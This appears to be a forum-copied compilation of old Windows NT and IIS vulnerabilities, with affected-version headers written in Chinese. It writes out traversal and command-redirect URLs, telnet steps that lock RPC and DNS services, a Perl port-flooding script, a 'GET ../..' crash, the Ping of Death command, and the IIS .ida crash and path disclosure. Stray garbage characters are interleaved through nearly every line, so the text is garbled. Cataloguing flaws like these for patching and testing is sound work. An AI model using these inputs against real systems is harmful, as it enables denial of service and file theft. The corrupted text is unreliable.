受影响系统:4.0,iis 1.0
" W+ z1 H, c7 \* \- {A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.0 K, e1 H- [6 W% _2 a
% i3 X- p0 @7 y, d6 aA URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script." s+ ~# q1 a0 ~( y8 ~5 g( s$ X
6 w( i$ [+ e3 `
By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.' G: a& ?3 M4 I" f
; h0 F. Q' n4 u8 R3 \
--------------------------------------------------------------------9 c3 ?, t2 C1 a% h0 F T" w
7 g# D0 U/ T4 e0 M受影响系统:4.0
& \9 k( M* N9 P! s0 ~4 Q& ZA URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
* b0 e, f" X O/ Q* y; d! y4 }: w0 h$ t6 C1 ^! u" ~4 R
If the file 'target.bat' exists, the file will be truncated. r! h6 V% r$ \7 m4 z9 l' m
3 u4 \. j. U# x' w0 u& }0 l9 Q* i' {% Y) e
A URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.) N: i- B3 n& Z2 |
1 B& o2 R7 k1 x% F
----------------------------------------------------------------------" x4 K: X7 O; W, D; l
& @( s/ D }9 l Z
受影响系统:3.51,4.0! v" N% q$ L3 h( k2 z9 Z! s6 ]" o8 S: x
Multiple service ports (53, 135, 1031) are vunerable to 'confusion'.
2 ^- R7 A9 e4 b) c
, ?' E+ F$ x) T9 G6 w8 j, AThe following steps;
4 Y1 C2 J, a* C1 c' B! G' w
' h: V, T. Q: @ e, _0 }Telnet to an NT 4.0 system on port 135 6 b! c4 Z {$ H2 o! Z9 b) }
Type about 10 characters followed by a <CR> 7 Q8 r: a4 l, ?( p+ Q
Exit Telnet * u/ b5 y/ v( ?
results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
9 N5 v5 |1 |$ g) V6 [
7 N; T) H9 m! L# h$ u8 @# ~When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.
# d% l8 v% n& _2 v& W, t: J
9 u) R+ \* R; c# d: zThe above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.
( k D/ u$ w1 ~7 T! d! U3 k* h
5 Q" r' D7 B; w2 c6 @If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.
* u$ e. l- I" V0 f
# i; f8 E9 v- R7 EThe following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):
% V6 e( M9 { R3 N
+ w \9 P& v: X2 ]$ K2 N/*begin poke code*/% D# p# M& B/ L* _0 G4 ~3 ^
0 L6 a8 x# l! I2 \7 V0 Huse Socket;, ~0 l" j: q7 G6 ^
use FileHandle;
+ k6 m5 u: W% p# R8 _require "chat2.pl";
# e+ x9 o+ E- m, X8 P! I0 f* [; n/ a3 v S- r
$systemname = $ARGV[0] && shift;* Y1 S7 e& D- H: c
/ W. `. P' E0 P0 @8 s$verbose = 1; # tell me what you're hitting
7 v2 I: |1 v& I" T$knownports = 1; # don't hit known problem ports( y' B, y% }; c; V7 ^# |
for ($port = $0; $port<65535; $port++) * y) `' M+ Q$ T9 \
{# \) b' J4 c7 z2 |
8 M& O1 y9 N3 `/ B% h8 O
* X0 ^) k; k" Lif ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {" w7 s: j& {8 j. ~& b+ O9 b7 ^2 ]# e
next;/ u# ^. i# a9 Z7 S
}
: b4 Q4 s; q: x) S8 C$fh = chat::open_port($systemname, $port);
# U: Q! h' o, l( @4 Fchat::print ($fh,"This is about ten characters or more");
! T' D* i+ A# q% N! U* E4 rif ($verbose) {
; z) F* N' j* |9 E- ^print "Trying port: $port\n";" ^6 _5 ?+ r( c8 L4 j6 K+ ~; z
}
* ]8 f; ~! |/ Y+ N: W/ Ychat::close($fh);: D! ~8 Y& J' M& K: Q! b
; m3 P; A/ n6 x9 m2 u}( a9 b+ u9 f6 }" V1 J( ~
/ [: @9 K) k3 }, V
: U% \+ ]: I" t: t* P& w ^
/*end poke code*// t' u7 C1 K* a( c! x) a
1 }7 T( }" f% f# v: Q9 o, B% xSave the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername
. j" O. c7 r2 D
3 X2 r3 h4 |. Z2 h( B5 g; m4 J--------------------------------------------------------------------------------
s7 D% d6 C" h7 y$ H. m
% n* d+ K' c1 j9 y1 T6 Z受影响系统:4.0
1 K8 a$ ]+ }5 Q$ _: Z' iUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.
. ?+ O& u" |9 V8 {" J
6 H! n0 g) e: [; M2 n2 l8 @# o: lThis attack causes Dr. Watson to display an alert window and to log an error: 8 Q9 Y& d& C" t
: [' a2 C. w4 }# g( }. R6 @& Q$ v"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"$ i3 D; r" t) o/ V
+ Z5 @1 o. p7 m3 `1 V--------------------------------------------------------------------------------
4 G; D5 b8 k) W6 \! x* y( G) K! q6 c" z' a! v) i# f- \& B7 N9 J$ }# _
受影响系统:3.51,4.0
$ e8 h# S6 m' T( g- W! ZLarge packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
, x. p! U9 Q& J% ^, N" e {6 Z: U0 O
" [9 l3 Z+ h# M8 y4 [+ ZSTOP: 0X0000001E5 y+ y4 v( _1 m" y6 d: U0 P
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS
( s) m/ }: a; O# P
* m, E+ |2 _" w5 }+ w-OR-( ~) J9 ^4 U. }( d" R$ Z
1 c1 y3 u+ r, p- J2 x
STOP: 0x0000000A
# g8 V3 _9 ~% {0 ^: T# P9 sIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS% R1 `2 y' C3 p, p: l
: _3 H5 `" ?& V8 b2 e3 s! O) \+ }NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
% ~& V7 `' f9 R' s6 I! ?, v' S' s- Y! J! X% U& r5 Y
--------------------------------------------------------------------------------
! Q+ B1 r, @3 g+ ]- A8 d- X: w) o) {! o+ z7 z
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure). + J$ s) R. S; S
; c3 j# Y( a- d: T, ?% T--------------------------------------------------------
5 Q7 Z0 [2 m& s/ M0 X3 `4 A
2 W) E4 \, S; P) @1 xIIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server |